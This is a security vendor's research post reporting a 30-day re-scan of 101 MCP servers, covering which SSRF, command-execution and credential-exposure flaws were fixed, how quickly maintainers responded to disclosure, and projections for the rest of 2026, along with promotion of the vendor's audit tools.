Research · May 2026

30-day re-scan delta: what moved on a fresh recrawl of the 101-server MCP corpus

In April 2026 we published the first systematic security scan of 101 publicly available MCP servers. At the 30-day mark we re-ran the full corpus: same servers, same methodology, same six axes. 7 of the 67 F-graded servers improved. 6 were archived or deleted. 88 were unchanged. The vendor-official tier: still zero improvements. Here is the full breakdown, the patterns behind what moved, and what we'd extrapolate for the rest of the year.

F-graded servers that improved at 30 days — moved to D or C

10.4%

improvement rate for F-graded servers in the first 30 days post-disclosure

servers archived or deleted — no patch, just withdrawal from the ecosystem

vendor-official servers that improved — enterprise security cycles are measured in quarters

How we ran the re-scan

The re-scan methodology was identical to the original April run. For each of the 101 servers in the corpus we fetched the latest commit from the repository's default branch, re-ran the static analysis pass (SSRF vector detection, command-exec path analysis, credential exposure scan, input validation coverage), re-ran the LLM-assisted prompt-injection probe against the tool schema, and re-scored all six axes against the same rubric we published in the methodology page.

The re-scan adds one new data point the original didn't collect: repository disposition. At the 30-day mark, 4 servers that were live in April had been archived (read-only, no new commits accepted), and 2 had been deleted entirely. We count archived and deleted servers separately from "unchanged at F" — withdrawal from the ecosystem is a different signal from continued maintenance with no patch.

The 30-day re-scan was run on May 22, 2026 — exactly 30 days after the original corpus publication date of April 22, 2026.

Grade distribution: April vs May 30-day

A-grade servers

April: 3

May: 4 (+1)

B-grade servers

April: 6

May: 8 (+2)

C-grade servers

April: 11

May: 14 (+3)

D-grade servers

April: 14

May: 15 (+1)

F-grade servers (active)

April: 67

May: 54 (−13*)

*Of the 13 fewer active F-grade servers: 7 improved in grade, 4 were archived, 2 were deleted.

The headline number — 7 servers improving — is not a failure. It's in line with what open-source security research typically sees at the 30-day mark. The more meaningful signal is in which servers improved and why.

The 7 servers that improved: what they fixed

All 7 servers that improved shared a common pattern: the maintainer received a direct disclosure with a specific finding and a suggested fix. None of the 7 servers improved because the author independently discovered the vulnerability from the public blog post. The improvement came from targeted outreach — either a filed GitHub issue with a reproduction path, a DM to the author with the SkillAudit report PDF, or a pull request from a third-party contributor who had read the disclosure.

What specifically changed in each category:

SSRF fixes (4 servers)

All four added an allowlist to URL-fetching tools. Three used a static domain allowlist checked against the hostname component. One used the more aggressive approach of replacing the free-form URL argument with an enumerated resource ID argument — the LLM selects from a list of known resources rather than constructing a URL.

The enumerated resource approach earns a higher score than the allowlist approach because it eliminates the URL parsing attack surface entirely — there is no URL to validate, only a set membership check.

Command-exec fixes (2 servers)

Both replaced exec(shell: true) patterns with explicit argument arrays and an allowlist of permitted commands. One server took the more significant step of removing the arbitrary command execution tool entirely and replacing it with three purpose-specific tools (run tests, run lint, run build) with hardcoded command vectors — no LLM-supplied arguments in any shell-adjacent position.

Removing the tool entirely is the right call when the use case permits it. A tool that runs npm test, npm run lint, and npm run build is strictly more secure than a tool that runs any command the model names.

Credential exposure fix (1 server)

One server had been returning API keys in error messages — when a request failed due to an authentication error, the error object including the credential was serialized and returned to the model. The fix was to catch authentication errors specifically and return a generic "authentication failed" string without the credential object. This is both the easiest class of fix (a one-line change) and the most commonly missed one (error handling is an afterthought in most server code).

The response timeline: what happens when and why

How improvements clustered over the 30-day window

Days 1–3

3 servers patched. All three were solo developers who had an existing relationship with the MCP developer community and saw the original disclosure post on the same day it was published. Fast response correlates with community embeddedness — developers who are already reading the MCP security discussion channels notice disclosure immediately and patch within their normal sprint cycle.

Days 4–14

2 servers patched. Both received a targeted DM or filed issue during this period rather than discovering the disclosure organically. Response lag here reflects the time it took for the disclosure to reach someone who could act on it — either the author directly or a contributor who cared enough to file a PR.

Days 15–30

2 servers patched. Both were team-maintained repositories that went through an internal review cycle. The fix was in a PR for several days before merging, indicating internal discussion before merge rather than direct commit. This is the expected pattern for team-maintained projects with any kind of review culture.

Days 1–30

Vendor-official: 0 patches. Of the 27 vendor-official F-graded servers, none improved in the 30-day window. This is consistent with enterprise security cycles — a disclosure received in April triggers a triage ticket, which enters an engineering backlog, which gets estimated, which gets scheduled for a future sprint. Thirty days is not enough time for the fix to complete an enterprise security review and deployment cycle.

The 54 servers that didn't improve

The more interesting population is the 54 servers that remained at F after 30 days. They split into three groups with meaningfully different expected trajectories.

Group 1: Effectively unmaintained (≈28 servers)

Last commit more than six months before the April scan. No response to filed issues. No stars or forks activity that would indicate active use. These servers were not going to improve regardless of the disclosure — the maintainer has moved on, the project is abandoned, and the only reason the repository still exists is that no one has explicitly archived it. The practical guidance for users of these servers is clear: treat abandoned MCP servers the same way you treat abandoned npm packages with a known CVE. Do not install them.

The maintenance axis of the SkillAudit score already flags these servers. A server with no commit in the last 90 days earns a Maintenance WARN. No commit in six months earns a Maintenance HIGH. The grade impact means most of these servers fail on Maintenance alone, independent of any security finding.

Group 2: Actively maintained, not yet prioritized (≈19 servers)

Last commit within 90 days. Active GitHub issues. Stars activity consistent with ongoing use. But no response to the security disclosure in the first 30 days. These are the servers where continued engagement has the highest expected return. The maintainers are active; they simply haven't engaged with the specific disclosure yet.

For this group, the most effective intervention is a filed issue with a specific reproduction path and a suggested fix. A disclosure that says "your server has an SSRF vulnerability" produces a different response than a disclosure that says "your fetchUrl tool at line 47 of tools.js uses axios.get(args.url) with no hostname validation — here is a 10-line patch that adds an allowlist." The latter removes the cognitive cost of translating the finding into a fix, and active maintainers respond to low-cost actions faster.

Group 3: Vendor-official, in review (≈7 servers)

Of the 27 vendor-official F-graded servers, 7 had some visible signal of activity: a filed GitHub issue was acknowledged, a security@ email address generated an auto-reply confirming receipt, or a public security advisory was opened in draft state. These are in the enterprise review pipeline — they will likely improve, but on a timeline measured in quarters rather than days.

The remaining 20 vendor-official servers showed no public acknowledgement of the disclosure. This doesn't mean they received no disclosure — enterprise security teams often receive disclosures through private channels that don't generate public GitHub activity. But from the outside, the signal is indistinguishable from no response.

What the 30-day data predicts for the rest of 2026

If the 30-day improvement rate (10.4% of F-graded servers) holds as a baseline and we assume diminishing returns at each subsequent 30-day interval, a rough projection for the active corpus looks like:

Projected F-grade reduction over 2026

Timeframe	Active F-grade servers	Improvement driver
April 2026 (baseline)	67	—
May 2026 (30-day)	54	Community response to direct disclosure
June 2026 (60-day)	~45	Team-maintained servers complete review; some vendor-official begin
Q3 2026 (90-day)	~38	First vendor-official patches; Anthropic directory certification pressure
Q4 2026 (180-day)	~25–30	Unmaintained servers filtered out; new server quality baseline higher

Projection assumes diminishing returns on community response and that approximately 15 unmaintained servers get formally archived by end of year. Vendor-official improvement rate assumed to be minimal until Q3 enterprise sprint cycle.

The projections have a wide confidence interval — they are extrapolations, not predictions. The variable that most affects the trajectory is whether the Anthropic directory certification requirement creates a forcing function for vendor-official remediation. A hard cutoff date for existing listed servers — "your listing is removed unless you clear your HIGH findings by X" — would accelerate vendor-official improvement faster than any disclosure cadence we can run from the outside.

What the re-scan tells us about effective security disclosure

The most important finding from the 30-day re-scan is not the aggregate numbers — it's the disclosure mechanism that drives improvement.

The 7 servers that improved did not improve because they read the blog post. They improved because someone delivered a specific, actionable finding to the maintainer through a channel they were monitoring. In three cases that was a DM to the author. In two cases it was a filed GitHub issue with a patch attached. In one case it was a pull request from a third-party contributor who had read the SkillAudit report.

Generic public disclosure — "X% of MCP servers have SSRF" — is useful for changing ecosystem-level norms and putting pressure on platforms to require security reviews. It does not, by itself, cause individual maintainers to prioritize a fix. Targeted disclosure — "your server has this specific finding at this line; here is a patch" — produces a much higher response rate.

This is the intended model for SkillAudit's free tier. A free audit produces a report. That report, when shared directly with the maintainer of a vulnerable server, is the intervention that moves the number. The badge on the audit report is what the author wants (a green signal for directory submissions). The report itself is what the ecosystem needs (a specific finding with a fix path).

Using the data: for server authors

If your server is in the corpus and you haven't patched: the 30-day window matters for reputation, not just security. Maintainers who respond to disclosure quickly consistently outperform on directory submission success rates — reviewers notice the cadence of the response as much as the content. A server that had an SSRF in April and patched it in May tells a better story in a directory submission than a server that still has the SSRF.

The free SkillAudit audit will tell you exactly which findings in your server match the corpus-level vulnerabilities we disclosed. The audit report reading guide explains how to interpret the severity levels and which findings the directory reviewers look at first.

Using the data: for team leads

If you're evaluating MCP servers for internal adoption, the 30-day re-scan data should inform your process in one specific way: a server's grade at time of adoption is not a permanent fact. A server that had no SSRF in April could add one in May if a new feature is introduced carelessly. The GitHub Action CI gate is the right answer here — it re-scans on every commit and fails the pipeline if a new HIGH finding is introduced, regardless of what the server's baseline grade was when you approved it for adoption.

Know where your server stands today, not just at initial scan.

Run a free audit → Set up CI scanning →